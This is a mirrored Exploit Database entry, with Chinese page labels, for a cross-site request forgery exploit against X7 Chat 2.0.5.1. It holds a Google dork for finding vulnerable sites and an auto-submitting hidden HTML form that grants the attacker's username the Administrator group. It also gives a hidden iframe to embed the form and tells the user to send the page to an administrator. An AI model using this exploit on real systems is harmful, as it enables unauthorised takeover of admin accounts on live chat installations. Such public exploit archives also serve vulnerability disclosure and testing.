X7 Chat 2.0.5.1 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 40 阅读

• 作者： DennSpec
  日期： 2012-05-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18850/

• # Exploit Title: X7 Chat 2.0.5.1 CSRF Add Admin Exploit
  # Google Dork: intitle:"Chat Room" "Powered By X7 Chat 2.0.5"
  # Date: 09.05.2012
  # Author: DennSpec
  # Software Link: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip
  # Version: <= 2.0.5.1
  
  firstly, register and give a username.
  
  (frame.html in path of your main html page)
  
  <html>
  <body onload="document.xform.submit();">
  <form name="xform" action="http://xxxxxxxxx.com/x7path/index.php?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post">
  <input type="hidden" name="username" value="YOURUSERNAME" />
  <input type="hidden" name="usergroup" value="Administrator" />
  </form>
  </body>
  </html>
  
  Replace http://xxxxxxxxx.com/x7path/ to your target url. Dont forget replace YOURUSERNAME to YOURUSERNAME.
  
  add this code to inside body tag of main html page:
  <iframe style="display:none;" src="https://www.exploit-db.com/exploits/18850/frame.html"></iframe>
  
  and... upload main page and frame.html . Send main page url to any administrator.